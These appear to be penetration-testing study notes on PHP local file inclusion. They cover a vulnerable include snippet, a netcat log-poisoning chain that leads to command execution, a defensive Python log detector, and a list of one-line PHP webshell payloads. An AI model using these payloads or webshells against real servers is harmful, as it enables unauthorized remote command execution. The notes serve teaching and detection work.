LFI - Theory & basic commands

#Identifying file inclusions:

Code review:

<?php
 $file = $_GET["file"];  // user-controlled request parameter
 include $file;          // included without any validation
?>

In code like this the value of the file parameter is passed straight to include without being validated, so whoever controls that parameter controls which file the server includes and executes.

#This type of attack assumes the ability to upload malicious files into the target application. If direct upload is not possible, poisoning a log file is an alternative: a raw request sent with netcat that contains a PHP string is written to the web server's access log, and including that log through the vulnerable parameter executes the string.

#netcat

nc -nv 192.168.177.10 80  #connect to target
<?php system($_GET['cmd']); ?>

#The connection might hang at this point
#Then include the log file through the vulnerable parameter to trigger RCE

...file=c:\xampp\apache\logs\access.log&cmd=ipconfig

  (runs ipconfig on the target and returns its output)

http://192.168.177.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
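From the defender's side, both stages of the log-poisoning chain above leave traces in the same access log. The following detector is an added example, not part of the original notes: it parses constructed Apache combined-format lines (sample data only, no real traffic) and flags a PHP tag in the request, traversal in the file parameter, a file parameter pointing at a log, and the combination of a log path with a cmd parameter.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
# They mirror the two stages above: the poisoning request and the inclusion.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /menu.php?file=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /<?php system($_GET['cmd']); ?> HTTP/1.1" 404 211 "-" "-"
10.0.0.9 - - [01/Jan/2024:10:01:30 +0000] "GET /menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig HTTP/1.1" 200 1833 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /menu.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 900 "-" "curl/8.0"
""".strip()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+"')
LOG_NAMES = ("access.log", "error.log", "access_log", "error_log")

def classify(line):
    """Return the finding tags for one log line (empty list if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = unquote_plus(m.group("target"))       # decode %2F etc. before matching
    findings = []
    if "<?php" in target.lower():
        findings.append("php-tag-in-request")       # stage 1: code written into the log
    params = parse_qs(urlsplit(target).query)
    file_vals = [v.lower().replace("\\", "/") for v in params.get("file", [])]
    if any("../" in v for v in file_vals):
        findings.append("traversal-in-file-param")
    if any(v.endswith(LOG_NAMES) or "/logs/" in v for v in file_vals):
        findings.append("log-file-in-file-param")
        if "cmd" in params:
            findings.append("log-inclusion-with-cmd")  # stage 2: log included with a cmd
    return findings

def scan(log_text):
    """Return (ip, findings) for every line that raised at least one finding."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            hits.append((line.split(" ", 1)[0], tags))
    return hits

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ", ".join(tags))
```

The parameter name `file` and the log paths are taken from the notes above; adapt them to the application's real parameter names and log locations.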

#PHP webshells

# Basic
<?php system("whoami"); ?>

#Get command execution on target
<?php system($_GET['cmd']); ?>

# Using passthru
<?php passthru($_GET['cmd']); ?>

# Echo output
<?php echo shell_exec("whoami");?>

<?php echo exec("whoami");?>

# Returns the output as an array, then prints it.
<?php exec("ls -la", $array); print_r($array); ?>

# preg_replace() with the /e modifier (deprecated in PHP 5.5, removed in PHP 7.0; only works on older PHP).
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

<?php echo `whoami`; ?>
